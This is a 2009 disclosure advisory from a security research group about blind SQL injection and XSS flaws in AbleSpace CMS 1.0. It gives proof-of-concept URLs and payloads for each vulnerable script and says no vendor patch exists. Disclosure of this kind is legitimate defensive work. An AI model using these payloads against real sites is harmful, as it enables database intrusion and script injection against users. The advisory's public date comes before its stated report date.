Services Vulnerabilities Exploits Publications News Blog About DSecRG


[DSECRG-09-037] AbleSpace CMS 1.0 - Multiple Security Vulnerabilities (Blind SQL Injection, XSS)

AbleSpace CMS has multiple security vulnerabilities:

1. Multiple Blind SQL Injections
2. Multiple Stored XSS
3. Multiple Linked XSS

Application: AbleSpace
Versions Affected: 1.0
Vendor URL: http://abk-soft.com/
Bugs: Multiple Blind SQL Injections, Multiple XSS
Exploits: YES
Reported: 18.03.2009
Vendor Response: NONE
Secondly Reported: 29.03.2009
Solution: NONE
Date of Public Advisory: 14.03.2009
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Details
*******

1. Multiple Blind Sql Injections

1.1 An attacker can inject SQL code in events_view.php vulnerable parameter id

Example:
http://[server]/[installdir]/events_view.php?eid=69'

1.2 An attacker can inject SQL code in events_clndr_view.php vulnerable parameter id

Example:
http://[server]/[installdir]/events_clndr_view.php?id=1 and substring(@@version,1,1)=4

2. Stored XSS

2.1 A vulnerability was found in the script blogs_full.php

Example:
<IMG SRC=javascript:alert('XSS')>

3. Multiple Linked XSS

3.1 Linked XSS vulnerabiliies were found in groups_profile.php. GET parameter "gid"

Example:
http://[server]/[installdir]/groups_profile.php?gid=311"><script>alert()</script>

3.2 Linked XSS vulnerabiliies were found in adv_cat.php. GET parameter "cat_id", "razd_id"

Example:
http://[server]/[installdir]/adv_cat.php?cat_id=4"><script>alert()</script>&razd_id=45"><script>alert()</script>



Solution
********

We did not get any response from vendor for more than 2 weeks.

No patches aviable.


About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru



Vulnerabilities RSS RSS
21.03.2012
[DSECRG-12-019] vCenter Orchestrator - password disclosure

22.02.2012
[DSECRG-12-018] Oracle Application Server - multiple security vulnerabilities

17.02.2012
[DSECRG-12-017] ASUS Net4Switch ipswcom.dll ActiveX - buffer overflow vulnerability

17.02.2012
[DSECRG-12-016] SAP MessagingSystem - information disclosure

17.02.2012
[DSECRG-12-014] SAP Internet Sales - XSS

17.02.2012
[DSECRG-12-015] SAP Adapter Monitor - information disclosure

Vulnerabilities list


© 2002—2014, ERPScan
For quoting or using materials from this site
link is obligatory

+44 (20) 81334493    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search